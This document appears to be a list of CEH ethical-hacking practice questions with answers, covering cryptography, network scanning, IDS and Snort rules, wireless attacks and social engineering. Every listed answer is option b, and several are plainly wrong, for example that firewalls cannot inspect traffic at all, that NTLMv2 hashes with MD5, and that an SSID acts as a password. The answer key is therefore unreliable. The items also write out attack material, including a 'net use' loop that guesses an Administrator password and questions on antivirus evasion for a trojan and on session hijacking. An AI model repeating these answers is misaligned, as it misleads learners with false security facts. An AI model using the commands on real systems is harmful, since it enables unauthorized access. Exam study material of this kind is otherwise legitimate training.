Google uses a unique cookie for each browser used by an individual user on a computer. This cookie contains information that allows Google to identify records about that user on its database. This cookie is submitted every time a user launches a Google search, visits a site using AdSense etc. The information stored in Google's database, identified by the cookie, includes Everything you search for using Google Every web page you visit that has Google Adsense ads How would you prevent Google from storing your search keywords? a. Use MAC OS X instead of Windows 7. Mac OS has higher level of privacy controls by default. b. Block Google Cookie by applying Privacy and Security settings in your web browser c. Disable the Google cookie using Google Advanced Search settings on Google Search page d. Do not use Google but use another search engine Bing which will not collect and store your search keywords

b. Block Google Cookie by applying Privacy and Security settings in your web browser

Most cases of insider abuse can be traced to individuals who are introverted, incapable of dealing with stress or conflict, and frustrated with their job, office politics, and lack of respect or promotion. Disgruntled employees may pass company secrets and intellectual property to competitors for monitory benefits. Here are some of the symptoms of a disgruntled employee: a. Frequently leaves work early, arrive late or call in sick b. Spends time surfing the Internet or on the phone c. Responds in a confrontational, angry, or overly aggressive way to simple requests or comments d. Always negative; finds fault with everything These disgruntled employees are the biggest threat to enterprise security. How do you deal with these threats? (Select 2 answers) a. Limit access to the applications they can run on their desktop computers and enforce strict work hour rules b. By implementing Virtualization technology from the desktop to the data centre,organizations can isolate different environments with varying levels of access and security to various employees c. Organizations must ensure that their corporate data is centrally managed and delivered to users just and when needed d. Limit Internet access,e-mail communications,access to social networking sites and job hunting portals

b. By implementing Virtualization technology from the desktop to the data centre,organizations can isolate different environments with varying levels of access and security to various employeesd. d.Limit Internet access,e-mail communications,access to social networking sites and job hunting portals

Which of the following is a primary service of the U.S. Computer Security Incident Response Team (CSIRT)? a. CSIRT provides a computer security surveillance service to supply a government with important intelligence information on individuals travelling abroad. b. CSIRT provides an incident response service to enable a reliable and trusted single point of contact for reporting computer security incidents worldwide. c. CSIRT provides a vulnerability assessment service to assist law enforcement agencies with profiling an individual's property or company's asset. d. CSIRT provides a penetration testing service to support exception reporting on incidents worldwide by individuals and multi-national corporations.

b. CSIRT provides an incident response service to enable a reliable and trusted single point of contact for reporting computer security incidents worldwide.

tackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft's /GS option use _____ defense against buffer overflow attacks. a. Non-executing stack b. Canary c. Hex editing d. Format checking

b. Canary

Which of the following processes of PKI (Public Key Infrastructure) ensures that a trust relationship exists and that a certificate is still valid for specific operations? a. Certificate cryptography b. Certificate validation c. Certificate issuance d. Certificate revocation

b. Certificate validation

Peter extracts the SIDs list from Windows 2000 Server machine using the hacking tool "SIDExtractor". Here is the output of the SIDs: Picture: (Test 6 #86) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-593.gif From the above list identify the user account with System Administrator privileges. a. Shawn b. Chang c. Rebecca d. Sheela e. Micah f. John g. Somia

b. Chang

Which property ensures that a hash function will not produce the same hashed value for two different messages? a. Key strength b. Collision resistance c. Entropy d. Bit length

b. Collision resistance

You are trying to package a RAT Trojan so that Anti-Virus software will not detect it. Which of the listed technique will NOT be effective in evading Anti-Virus scanner? a. Change the content of the Trojan using hex editor and modify the checksum b. Convert the Trojan.exe file extension to Trojan.txt disguising as text file c. Break the Trojan into multiple smaller files and zip the individual pieces d. Encrypt the Trojan using multiple hashing algorithms like MD5 and SHA-1

b. Convert the Trojan.exe file extension to Trojan.txt disguising as text file

After an attacker has successfully compromised a remote computer, what would be one of the last steps that would be taken to ensure that the compromise is not traced back to the source of the problem? a. Setup a backdoor b. Cover your tracks c. Install pactehs d. Install a zombie for DDOS

b. Cover your tracks

An attacker uses a communication channel within an operating system that is neither designed nor intended to transfer information. What is the name of the communications channel? a. Classified b. Covert c. Encrypted d. Overt

b. Covert

Which one of the following instigates a SYN flood attack? a. Inserting repetitive Internet Relay Chat (IRC) messages. b. Creating a high number of half-open connections. c. Generating excessive broadcast packets. d. A large number of Internet Control Message Protocol (ICMP) traces.

b. Creating a high number of half-open connections.

In Buffer Overflow exploit, which of the following registers gets overwritten with return address of the exploit code? a. EEP b. EIP c. EAP d. ESP

b. EIP

How do you defend against DHCP Starvation attack? Picture: (Test 1 #36) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-029.gif a. Install DHCP filters on the switch to block this attack b. Enable DHCP snooping on the switch c. Configure DHCP-BLOCK to 1 on the switch d. Enable ARP-Block on the switch

b. Enable DHCP snooping on the switch

How do you defend against MAC attacks on a switch? Picture: (Test 2 #28) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-140.gif a. Configure IP security on the switch b. Enable Port Security on the switch c. Disable SPAN port on the switch d. Enable SNMP Trap on the switch

b. Enable Port Security on the switch

What is the most secure way to mitigate the theft of corporate information from a laptop that was left in a hotel room? a. Use a strong logon password to the operating system. b. Encrypt the data on the hard drive. c. Back up everything on the laptop and store the backup in a safe place. d. Set a BIOS password.

b. Encrypt the data on the hard drive.

Eve is spending her day scanning the library computers. She notices that Alice is using a computer whose port 445 is active and listening. Eve uses the ENUM tool to enumerate Alice machine. From the command prompt, she types the following command. For /f "tokens=1 %%a in (hackfile.txt) do net use * \10.1.2.3\c$ /user: "Administrator" %%a What is Eve trying to do? a. Eve is trying to connect as an user with Administrator privileges b. Eve is trying to carry out a password crack for user Administrator c. Eve is trying to enumerate all users with Administrative privileges d. Eve is trying to escalate privilege of the null user to that of Administrator

b. Eve is trying to carry out a password crack for user Administrator

Smart cards use which protocol to transfer the certificate in a secure manner? a. Point to Point Protocol (PPP) b. Extensible Authentication Protocol (EAP) c. Layer 2 Tunneling Protocol (L2TP) d. Point to Point Tunneling Protocol (PPTP)

b. Extensible Authentication Protocol (EAP)

Which type of scan measures a person's external features through a digital video camera? a. Iris scan b. Facial recognition scan c. Signature kinetics scan d. Retinal scan

b. Facial recognition scan

When analyzing the IDS logs, the system administrator noticed an alert was logged when the external router was accessed from the administrator's computer to update the router configuration. What type of an alert is this? a. False negative b. False positive c. True negative d. True positve

b. False positive

Bob has set up three web servers on Windows Server 2008 IIS 7.0. Bob has followed all the recommendations for securing the operating system and IIS. These servers are going to run numerous e-commerce websites that are projected to bring in thousands of dollars a day. Bob is still concerned about the security of these servers because of the potential for financial loss. Bob has asked his company's firewall administrator to set the firewall to inspect all incoming traffic on ports 80 and 443 to ensure that no malicious data is getting into the network. Why will this not be possible? a. Firewalls cannot inspect traffic coming through port 80 b. Firewalls cannot inspect traffic at all,they can only block or allow certain ports c. Firewalls can only inspect outbound traffic d. Firewalls cannot inspect traffic coming through port 443

b. Firewalls cannot inspect traffic at all,they can only block or allow certain ports

In keeping with the best practices of layered security, where are the best places to place intrusion detection/intrusion prevention systems? (Choose two.) a. NID/NIP (Node-based Intrusion Detection/Node-based Intrusion Prevention) b. HID/HIP (Host-based Intrusion Detection/Host-based Intrusion Prevention) c. NID/NIP (Network-based Intrusion Detection/Network-based Intrusion Prevention) d. CID/CIP (Computer-based Intrusion Detection/Computer-based Intrusion Prevention)

b. HID/HIP (Host-based Intrusion Detection/Host-based Intrusion Prevention) c. NID/NIP (Network-based Intrusion Detection/Network-based Intrusion Prevention)

Basically, there are two approaches to network intrusion detection: signature detection, and anomaly detection. The signature detection approach utilizes well-known signatures for network traffic to identify potentially malicious traffic. The anomaly detection approach utilizes a previous history of network traffic to search for patterns that are abnormal, which would indicate an intrusion. How can an attacker disguise his buffer overflow attack signature such that there is a greater probability of his attack going undetected by the IDS? a. He can chain NOOP instructions into a NOOP "sled" that advances the processor's instruction pointer to a random place of choice b. He can use polymorphic shell code-with a tool such as ADMmutate - to change the signature of his exploit as seen by a network IDS c. He can use a shellcode that will perform a reverse telnet back to his machine d. He can use a dynamic return address to overwrite the correct value in the target machine computer memory

b. He can use polymorphic shell code-with a tool such as ADMmutate - to change the signature of his exploit as seen by a network IDS

An attacker is attempting to telnet into a corporation's system in the DMZ. The attacker doesn't want to get caught and is spoofing his IP address. After numerous tries he remains unsuccessful in connecting to the system. The attacker rechecks that the target system is actually listening on Port 23 and he verifies it with both nmap and hping2. He is still unable to connect to the target system. What could be the reason? a. He needs to use an automated tool to telnet in b. He cannot spoof his IP and successfully use TCP c. The firewall is blocking port 23 to that system d. He is attacking an operating system that does not reply to telnet even when open

b. He cannot spoof his IP and successfully use TCP

Study the snort rule given below: Picture: (Test 7 #26) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-630.gif From the options below, choose the exploit against which this rule applies. a. MyDoom b. MS Blaster c. SQL Slammer d. WebDav

b. MS Blaster

You ping a target IP to check if the host is up. You do not get a response. You suspect ICMP is blocked at the firewall. Next you use hping2 tool to ping the target host and you get a response. Why does the host respond to hping2 and not ping packet? Picture: (Test 3 #24) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-236.gif a. You must use ping 10.2.3.4 switch b. Hping2 uses TCP instead of ICMP by default c. Hping2 uses stealth TCP packets to connect d. Ping packets cannot bypass firewalls

b. Hping2 uses TCP instead of ICMP by default

Symmetric encryption algorithms are known to be fast but present great challenges on the key management side. Asymmetric encryption algorithms are slow but allow communication with a remote host without having to transfer a key out of band or in person. If we combine the strength of both crypto systems where we use the symmetric algorithm to encrypt the bulk of the data and then use the asymmetric encryption system to encrypt the symmetric key, what would this type of usage be known as? a. Combined system b. Hybrid system c. Symmetric system d. Asymmetric system

b. Hybrid system

Jim's organization has just completed a major Linux roll out and now all of the organization's systems are running the Linux 2.5 kernel. The roll out expenses has posed constraints on purchasing other essential security equipment and software. The organization requires an option to control network traffic and also perform stateful inspection of traffic going into and out of the DMZ. Which built-in functionality of Linux can achieve this? a. IP Chains b. IP Tables c. IP ICMP d. IP Sniffer

b. IP Tables

A security engineer has been asked to deploy a secure remote access solution that will allow employees to connect to the company's internal network. Which of the following can be implemented to minimize the opportunity for the man-in-the-middle attack to occur? a. Mutual authentication b. IPSec c. SSL d. Static IP addresses

b. IPSec

Which of the following is true of the wireless Service Set ID (SSID)? (Select all that apply.) a. Should be left at the factory default setting b. Identifies the wireless network c. Acts as a password for network access d. Not broadcasting the SSID defeats NetStumbler and other wireless discovery tools

b. Identifies the wireless network c. Acts as a password for network access

Which vital role does the U.S. Computer Security Incident Response Team (CSIRT) provide? a. Maintenance of the nation's Internet infrastructure,builds out new Internet infrastructure, and decommissions old Internet infrastructure b. Incident response services to any user, company, government agency, or organization in partnership with the Department of Homeland Security c. Measurement of key vulnerability assessments on behalf of the Department of Defense (DOD) and State Department, as well as private sectors d. Registration of critical penetration testing for the Department of Homeland Security and public and private sectors

b. Incident response services to any user, company, government agency, or organization in partnership with the Department of Homeland Security

You just purchased the latest DELL computer, which comes pre-installed with Windows 7, McAfee antivirus software and a host of other applications. You want to connect Ethernet wire to your cable modem and start using the computer immediately. Windows is dangerously insecure when unpacked from the box, and there are a few things that you must do before you use it. Choose at least one answer: a. Key applications such as Adobe Acrobat,Macromedia Flash,Java,Winzip etc.,must have the latest security patches installed b. Install the latest signatures for Antivirus software c. New installation of Windows should be patched by installing the latest service packs and hotfixes d. Install a personal firewall and lock down unused ports from connecting to your computer e. You can start using your computer as vendors such as DELL,HP and IBM would have already installed the latest service packs. f. Create a non-admin user with a complex password and logon to this account g. Configure "Windows Update" to automatic

b. Install the latest signatures for Antivirus software c. New installation of Windows should be patched by installing the latest service packs and hotfixes d. Install a personal firewall and lock down unused ports from connecting to your computer f. Create a non-admin user with a complex password and logon to this account g. Configure "Windows Update" to automatic

Which of the following are potential attacks on cryptography? (Select 3) a. Known-Ciphertext Attack b. Man-in-the-Middle Attack c. Chosen-Ciphertext Attack d. Replay Attack e. One-Time-Pad Attack

b. Man-in-the-Middle Attack c. Chosen-Ciphertext Attack d. Replay Attack

Annie has just succeeded in stealing a secure cookie via a XSS attack. She is able to replay the cookie even while the session is invalid on the server. Why do you think this is possible? a. It works because encryption is performed at the network layer (layer 1 encryption) b. It works because encryption is performed at the application layer (single encryption key) c. The scenario is invalid as a secure cookie cannot be replayed d. Any cookie can be replayed irrespective of the session status

b. It works because encryption is performed at the application layer (single encryption key)

Jacob is looking through a traffic log that was captured using Wireshark. Jacob has come across what appears to be SYN requests to an internal computer from a spoofed IP address. What is Jacob seeing here? a. Jacob is seeing a Smurf attack. b. Jacob is seeing a SYN flood. c. He is seeing a SYN/ACK attack. d. He has found evidence of an ACK flood.

b. Jacob is seeing a SYN flood.

Which of the following are well know password-cracking programs?(Choose all that apply. a. Netbus b. John the Ripper c. L0phtcrack d. Jack the Ripper e. NetCat

b. John the Ripper c. L0phtcrack

Which of the following are valid types of rootkits? (Choose three.) a. Physical level b. Kernel level c. Network level d. Data access level e. Application level f. Hypervisor level

b. Kernel level e. Application level f. Hypervisor level

Kevin is an IT security analyst working for Emerson Time Makers, a watch manufacturing company in Miami. Kevin and his girlfriend Katy recently broke up after a big fight. Kevin believes hat she was seeing another person. Kevin, who has an online email account that he uses for most of his mail, knows that Katy has an account with that same company. Kevin logs into his email account online and gets the following URL after successfully logged in: http://www.youremailhere.com/mail.asp?mailbox=Kevin&Smith=121%22 Kevin changes the URL to: http://www.youremailhere.com/mail.asp?mailbox=Katy&Sanchez=121%22 Kevin is trying to access her email account to see if he can find out any information. What is Kevin attempting here to gain access to Katy's mailbox? a. This type of attempt is called URL obfuscation when someone manually changes a URL to try and gain unauthorized access b. Kevin is trying to utilize query string manipulation to gain access to her email account c. By changing the mailbox's name in the URL,Kevin is attempting directory transversal d. He is attempting a path-string attack to gain access to her mailbox

b. Kevin is trying to utilize query string manipulation to gain access to her email account

What tool can crack Windows SMB passwords simply by listening to network traffic? Select the best answer. a. Netbus b. L0phtcrack c. This is not possible d. NTFSDOS

b. L0phtcrack

Harold works for Jacobson Unlimited in the IT department as the security manager. Harold has created a security policy requiring all employees to use complex 14 character passwords. Unfortunately, the members of management do not want to have to use such long complicated passwords so they tell Harold's boss this new password policy should not apply to them. To comply with the management's wishes, the IT department creates another Windows domain and moves all the management users to that domain. This new domain has a password policy only requiring 8 characters. Harold is concerned about having to accommodate the managers, but cannot do anything about it. Harold is also concerned about using LanManager security on his network instead of NTLM or NTLMv2, but the many legacy applications on the network prevent using the more secure NTLM and NTLMv2. Harold pulls the SAM files from the DC's on the original domain and the new domain using Pwdump6. Harold uses the password cracking software John the Ripper to crack users' passwords to make sure they are strong enough. Harold expects that the users' passwords in the original domain will take much longer to crack than the management's passwords in the new domain. After running the software, Harold discovers that the 14 character passwords only took a short time longer to crack than the 8 character passwords. Why did the 14 character passwords not take much longer to crack than the 8 character passwords? a. Harold should use LC4 instead of John the Ripper b. LanManger hashes are broken up into two 7 character fields c. Harold should have used Dumpsec instead of Pwdump6 d. Harold's dictionary file was not large enough

b. LanManger hashes are broken up into two 7 character fields

Lee is using Wireshark to log traffic on his network. He notices a number of packets being directed to an internal IP from an outside IP where the packets are ICMP and their size is around 65, 536 bytes. What is Lee seeing here? a. Lee is seeing activity indicative of a Smurf attack. b. Lee is seeing a Ping of death attack. c. Most likely,the ICMP packets are being sent in this manner to attempt IP spoofing. d. This is not unusual traffic,ICMP packets can be of any size.

b. Lee is seeing a Ping of death attack.

Which of the following does proper basic configuration of snort as a network intrusion detection system require? a. Limit the packets captured to a single segment. b. Limit the packets captured to the snort configuration file. c. Limit the packets captured to the /var/log/snort directory. d. Capture every packet on the network segment.

b. Limit the packets captured to the snort configuration file.

A company has hired a security administrator to maintain and administer Linux and Windows-based systems. Written in the nightly report file is the following. Firewall log files are at the expected value of 4 M~ The current time is 12am. Exactly two hours later the size has decreased considerably. Another hour goes by and the log files have shrunk in size again. Which of the following actions should the security administrator take? a. Log the event as suspicious activity,call a manager,and report this as soon as possible. b. Log the event as suspicious activity,continue to investigate,and act according to the site's security policy. c. Log the event as suspicious activity and report this behavior to the incident response team immediately. d. Run an anti-virus scan because it is likely the system is infected by malware.

b. Log the event as suspicious activity,continue to investigate,and act according to the site's security policy.

A tester is attempting to capture and analyze the traffic on a given network and realizes that the network has several switches. What could be used to successfully sniff the traffic on this switched network? (Choose three.) a. SYN flood b. MAC duplication c. Reverse smurf attack d. MAC flooding e. ARP broadcasting f. ARP spoofing

b. MAC duplication d. MAC flooding f. ARP spoofing

What is the default Password Hash Algorithm used by NTLMv2? a. MD4 b. MD5 c. DES d. SHA-1

b. MD5

Which of the following is an example of an asymmetric encryption implementation? a. MD5 b. PGP c. SHA1 d. 3DES

b. PGP

How does traceroute map the route a packet travels from point A to point B? a. Uses a TCP timestamp packet that will elicit a time exceeded in transit message b. Manipulates the value of the time to live (TTL) within packet to elicit a time exceeded in transit message c. Uses a protocol that will be rejected by gateways on its way to the destination d. Manipulates the flags within packets to force gateways into generating error messages

b. Manipulates the value of the time to live (TTL) within packet to elicit a time exceeded in transit message

Which of the following scanning tools is specifically designed to find potential exploits in Microsoft Windows products? a. Core Impact b. Microsoft Baseline Security Analyzer c. Retina d. Microsoft Security Baseline Analyzer

b. Microsoft Baseline Security Analyzer

Which of the following resources does NMAP need to be used as a basic vulnerability scanner covering several vectors like SMB, HTTP and FTP? a. SAINT scripting engine b. NMAP scripting engine c. Metasploit scripting engine d. Nessus scripting engine

b. NMAP scripting engine

Neil is an IT security consultant working on contract for Davidson Avionics. Neil has been hired to audit the network of Davidson Avionics. He has been given permission to perform any tests necessary. Neil has created a fake company ID badge and uniform. Neil waits by one of the company's entrance doors and follows an employee into the office after they use their valid access card to gain entrance. What type of social engineering attack has Neil employed here? a. This type of social engineering attack is called man trapping b. Neil has used a tailgating social engineering attack to gain access to the offices c. Neil is using the technique of reverse social engineering to gain access to the offices of Davidson Avionics d. He has used a piggybacking technique to gain unauthorized access

b. Neil has used a tailgating social engineering attack to gain access to the offices

Sandra is conducting a penetration test for XYZ.com. She knows that XYZ.com is using wireless networking for some of the offices in the building right down the street. Through social engineering she discovers that they are using 802.11g. Sandra knows that 802.11g uses the same 2.4GHz frequency range as 802.11b. Using NetStumbler and her 802.11b wireless NIC, Sandra drives over to the building to map the wireless networks. However, even though she repositions herself around the building several times, Sandra is not able to detect a single AP. What do you think is the reason behind this? a. You can only pick up 802.11g signals with 802.11a wireless cards. b. Netstumbler does not work against 802.11g. c. Sandra must be doing something wrong,as there is no reason for her to not see the signals. d. The access points probably have disabled broadcasting of the SSID so they cannot be detected. e. The access points probably have WEP enabled so they cannot be detected. f. 802.11g uses OFDM while 802.11b uses DSSS so despite the same frequency and 802.11b card cannot see an 802.11g signal.

b. Netstumbler does not work against 802.11g.

Which of the following techniques can be used to mitigate the risk of an on-site attacker from connecting to an unused network port and gaining full access to the network? (Choose three.) a. IPSec Encryption b. Network Admission Control (NAC) c. 802.1q Port Based Authentication d. 802.1x Port Based Authentication e. Port Security f. Intrusion Detection System (IDS)

b. Network Admission Control (NAC) d. 802.1x Port Based Authentication e. Port Security

When using Wireshark to acquire packet capture on a network, which device would enable the capture of all traffic on the wire? a. Layer 3 switch b. Network tap c. Network bridge d. Application firewall

b. Network tap

What is the proper response for a NULL scan if the port is open? a. RST b. No response c. FIN d. ACK e. PSH f. SYN

b. No response

While examining audit logs, you discover that people are able to telnet into the SMTP server on port 25. You would like to block this, though you do not see any evidence of an attack or other wrong doing. However, you are concerned about affecting the normal functionality of the email server. From the following options choose how best you can achieve this objective? a. Shut off the SMTP service on the server. b. None of the answers apply. c. Switch from Windows Exchange to UNIX Sendmail. d. Block port 25 at the firewall. e. Force all connections to use a username and password.

b. None of the answers apply.

Clive has been hired to perform a Black-Box test by one of his clients. How much information will Clive obtain from the client before commencing his test? a. IP Range,OS,and patches installed. b. Nothing but corporate name. c. Only the IP address range. d. All that is available from the client site.

b. Nothing but corporate name.

When comparing the testing methodologies of Open Web Application Security Project (OWASP) and Open Source Security Testing Methodology Manual (OSSTMM) the main difference is a. OSSTMM is gray box testing and OWASP is black box testing. b. OSSTMM addresses controls and OWASP does not. c. OWASP addresses controls and OSSTMM does not. d. OWASP is for web applications and OSSTMM does not include web applications.

b. OSSTMM addresses controls and OWASP does not.

Lauren is performing a network audit for her entire company. The entire network is comprised of around 500 computers. Lauren starts an ICMP ping sweep by sending one IP packet to the broadcast address of the network, but only receives responses from around five hosts. Why did this ping sweep only produce a few responses? a. Only servers will reply to this scan. b. Only Linux and Unix-like (Non-Windows) systems will reply to this scan. c. Only Windows systems will reply to this scan. d. A switched network will not respond to packets sent to the broadcast address.

b. Only Linux and Unix-like (Non-Windows) systems will reply to this scan.

Bob has been hired to perform a penetration test on XYZ.com. He begins by looking at IP address ranges owned by the company and details of domain name registration. He then goes to News Groups and financial web sites to see if they are leaking any sensitive information of have any technical details online. Within the context of penetration testing methodology, what phase is Bob involved with? a. Active information gathering b. Passive information gathering c. Vulnerability Mapping d. Attack phase

b. Passive information gathering

How can rainbow tables be defeated? a. Lockout accounts under brute force password cracking attempts b. Password salting c. Use of non-dictionary words d. All uppercase character passwords

b. Password salting

John the Ripper is a technical assessment tool used to test the weakness of which of the following? a. File permissions b. Passwords c. Usernames d. Firewall rulesets

b. Passwords

You are conducting a port scan on a subnet that has ICMP blocked. You have discovered 23 live systems and after scanning each of them you notice that they all show port 21 in closed state. What should be the next logical step that should be performed? a. Connect to open ports to discover applications. b. Perform a SYN scan on port 21 to identify any additional systems that might be up. c. Rescan every computer to verify the results. d. Perform a ping sweep to identify any additional systems that might be up.

b. Perform a SYN scan on port 21 to identify any additional systems that might be up.

When a malicious hacker identifies a target and wants to eventually compromise this target, what would be among the first steps that he would perform? (Choose the best answer) a. Gain access to the remote computer in order to conceal the venue of attacks. b. Perform a reconnaissance of the remote target for identical of venue of attacks. c. Cover his tracks by eradicating the log files and audit trails. d. Always begin with a scan in order to quickly identify venue of attacks.

b. Perform a reconnaissance of the remote target for identical of venue of attacks.

Tess King, the evil hacker, is purposely sending fragmented ICMP packets to a remote target. The total size of this ICMP packet once reconstructed is over 65, 536 bytes. From the information given, what type of attack is Tess King attempting to perform? a. Smurf b. Ping of death c. Syn flood d. Fraggle

b. Ping of death

WWW wanderers or spiders are programs that traverse many pages in the World Wide Web by recursively retrieving linked pages. Search engines like Google, frequently spider web pages for indexing. How will you stop web spiders from crawling certain directories on your website? a. Enable SSL on the restricted directories which will block these spiders from crawling b. Place robots.txt file in the root of your website with listing of directories that you don't want to be crawled c. Place "HTTP:NO CRAWL" on the html pages that you don't want the crawlers to index d. Place authentication on root directories that will prevent crawling from these spiders

b. Place robots.txt file in the root of your website with listing of directories that you don't want to be crawled

A company has made the decision to host their own email and basic web services. The administrator needs to set up the external firewall to limit what protocols should be allowed to get to the public part of the company's network. Which ports should the administrator open? (Choose three.) a. Port 23 b. Port 25 c. Port 139 d. Port 22 e. Port 80 f. Port 53 g. Port 445

b. Port 25 e. Port 80 f. Port 53

Jason's Web server was attacked by a trojan virus. He runs protocol analyzer and notices that the trojan communicates to a remote server on the Internet. Shown below is the standard "hexdump" representation of the network packet, before being decoded. Jason wants to identify the trojan by looking at the destination port number and mapping to a trojan-port number database on the Internet. Identify the remote server's port number by decoding the packet? a. Port 1909 (Net-Devil Trojan) b. Port 6667 (Net-Devil Trojan) c. Port 1786 (Net-Devil Trojan) d. Port 1890 (Net-Devil Trojan)

b. Port 6667 (Net-Devil Trojan)

Which security control role does encryption meet? a. Detective b. Preventative c. Defensive d. Offensive

b. Preventative

Passive reconnaissance involves collecting information through which of the following? a. Man in the middle attacks b. Publicly accessible sources c. Social engineering d. Network traffic sniffing

b. Publicly accessible sources

A recently hired network security associate at a local bank was given the responsibility to perform daily scans of the internal network to look for unauthorized devices. The employee decides to write a script that will scan the network for unauthorized devices every morning at 5:00 am. Which of the following programming languages would most likely be used? a. C b. Python c. ASP.NET d. PHP

b. Python

Which of the following encryption is NOT based on block cipher? a. AES (Rijndael) b. RC4 c. Blowfish d. DES

b. RC4

Which of the following is optimized for confidential communications, such as bidirectional voice and video? a. RC5 b. RC4 c. MD5 d. MD4

b. RC4

Which of the following levels of algorithms does Public Key Infrastructure (PKI) use? a. AES 1024 bit strength b. RSA 1024 bit strength c. AES 512 bit strength d. RSA 512 bit strength

b. RSA 1024 bit strength

What is the proper response for a NULL scan if the port is closed? a. PSH b. RST c. SYN d. No response e. ACK f. FIN

b. RST

An IT security engineer notices that the company's web server is currently being hacked. What should the engineer do next? a. Determine the origin of the attack and launch a counterattack. b. Record as much information as possible from the attack. c. Perform a system restart on the company's web server. d. Unplug the network connection on the company's web server.

b. Record as much information as possible from the attack.

Which of the following would be the best reason for sending a single SMTP message to an address that does not exist within the target company? a. To create a denial of service attack. b. To gather information about internal hosts used in email treatment. c. To gather information about procedures that are in place to deal with such messages. d. To verify information about the mail administrator and his address.

b. To gather information about internal hosts used in email treatment.

William has received a Chess game from someone in his computer programming class through email. William does not really know the person who sent the game very well, but decides to install the game anyway because he really likes Chess. Picture: (Test 2 #6) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-108.gif After William installs the game, he plays it for a couple of hours. The next day, William plays the Chess game again and notices that his machine has begun to slow down. He brings up his Task Manager and sees the following programs running: What has William just installed? a. Zombie Zapper (ZoZ) b. Remote Access Trojan (RAT) c. Bot IRC Tunnel (BIT) d. Root Digger (RD)

b. Remote Access Trojan (RAT)

Matthew re-injects a captured wireless packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Matthew assumes it is an ARP request packet. The wireless host responds with a stream of responses, all individually encrypted with different IVs. What is this attack most appropriately called? a. Spoof attack b. Replay attack c. Rebound attack d. Injection attack

b. Replay attack

Which type of scan is used on the eye to measure the layer of blood vessels? a. Facial recognition scan b. Retinal scan c. Iris scan d. Signature kinetics scan

b. Retinal scan

In order to attack a wireless network, you put up an access point and override the signal of the real access point. As users send authentication data, you are able to capture it. What kind of attack is this? a. WEP attack b. Rouge access point attack c. Unauthorized access point attack d. War Chalking

b. Rouge access point attack

Which type of access control is used on a router or firewall to limit network activity? a. Discretionary b. Rule-based c. Role-based d. Mandatory

b. Rule-based

Exhibit: Picture: (Test 7 #37) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-621.gif Based on the following extract from the log of a compromised machine, what is the hacker really trying to steal? a. wwwroot b. SAM file c. har.txt d. Repair file

b. SAM file

Which of the following is not considered to be a part of active sniffing? a. ARP Spoofing b. SMAC Fueling c. MAC Flooding d. MAC Duplicating

b. SMAC Fueling

Sandra has been actively scanning the client network on which she is doing a vulnerability assessment test. While conducting a port scan she notices open ports in the range of 135 to 139. What protocol is most likely to be listening on those ports? a. FTP b. SMB c. Finger d. Samba

b. SMB

At a Windows Server command prompt, which command could be used to list the running services? a. Sc query type=running b. Sc query c. Sc config d. Sc query \\servername

b. Sc query

Which of the following activities will NOT be considered as passive footprinting? a. Search on financial site such as Yahoo Financial to identify assets. b. Scan the range of IP address found in the target DNS database. c. Go through the rubbish to find out any information that might have been discarded. d. Perform multiples queries using a search engine.

b. Scan the range of IP address found in the target DNS database.

According to the CEH methodology, what is the next step to be performed after footprinting? a. Enumeration b. Scanning c. Expanding Influence d. Social Engineering e. System Hacking

b. Scanning

What information should an IT system analysis provide to the risk assessor? a. Impact analysis b. Security architecture c. Threat statement d. Management buy-in

b. Security architecture

Which of the following examples best represents a logical or technical control? a. Corporate security policy b. Security tokens c. Smoke and fire alarms d. Heating and air conditioning

b. Security tokens

You are trying to hijack a telnet session from a victim machine with IP address 10.0.0.5 to Cisco router at 10.0.0.1. You sniff the traffic and attempt to predict the sequence and acknowledgement numbers to successfully hijack the telnet session. Here is the captured data in tcpdump. Picture: (Test 3 #11) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-215.gif What are the next sequence and acknowledgement numbers that the router will send to the victim machine? a. Sequence number: 82980010 Acknowledgement number: 17768885 b. Sequence number: 82980070 Acknowledgement number: 17768885 c. Sequence number: 87000070 Acknowledgement number: 85320085 d. Sequence number: 17768729 Acknowledgement number: 82980070

b. Sequence number: 82980070 Acknowledgement number: 17768885

Which initial procedure should an ethical hacker perform after being brought into an organization? a. Turn over deliverables. b. Sign a formal contract with non-disclosure. c. Begin security testing. d. Assess what the organization is trying to protect.

b. Sign a formal contract with non-disclosure.

Eve decides to get her hands dirty and tries out a Denial of Service attack that is relatively new to her. his time she envisages using a different kind of method to attack Brownies Inc. Eve tries to forge the packets and uses the broadcast address. She launches an attack similar to that of fraggle. What is the technique that Eve used in the case above? a. SYN Flood b. Smurf c. Ping of Death d. Bubonic

b. Smurf

What is the term 8 to describe an attack that falsifies a broadcast ICMP echo request and includes a primary and secondary victim? a. Fraggle Attack b. Smurf Attack c. Man in the Middle Attack d. Trojan Horse Attack e. Back Orifice Attack

b. Smurf Attack

Simon is security analyst writing signatures for a Snort node he placed internally that captures all mirrored traffic from his border firewall. From the following signature, what will Snort look for in the payload of the suspected packets? alert tcp $EXTERNAL_NET any -> $HOME_NET 27374 (msG. "BACKDOOR SIG - SubSseven 22";flags: A+; content: "|0d0a5b52504c5d3030320d0a|"; reference:arachnids, 485;) alert a. The payload of 485 is what this Snort signature will look for. b. Snort will look for 0d0a5b52504c5d3030320d0a in the payload. c. Packets that contain the payload of BACKDOOR SIG - SubSseven 22 will be flagged. d. From this snort signature,packets with HOME_NET 27374 in the payload will be flagged.

b. Snort will look for 0d0a5b52504c5d3030320d0a in the payload.

Eric notices repeated probes to port 1080. He learns that the protocol being used is designed to allow a host outside of a firewall to connect transparently and securely through the firewall. He wonders if his firewall has been breached. What would be your inference? a. The attacker is using the ICMP protocol to have a covert channel b. Somebody is using SOCKS on the network to communicate through the firewall c. Eric has a Wingate package providing FTP redirection on his network d. Eric network has been penetrated by a firewall breach

b. Somebody is using SOCKS on the network to communicate through the firewall

Low humidity in a data center can cause which of the following problems? a. Heat b. Static electricity c. Airborne contamination d. Corrosion

b. Static electricity

A security engineer is attempting to map a company's internal network. The engineer enters in the following NMAP command. NMAP -n -sS -P0 -p 80 ***.***.**.** What type of scan is this? a. Comprehensive scan b. Stealth scan c. Intense scan d. Quick scan

b. Stealth scan

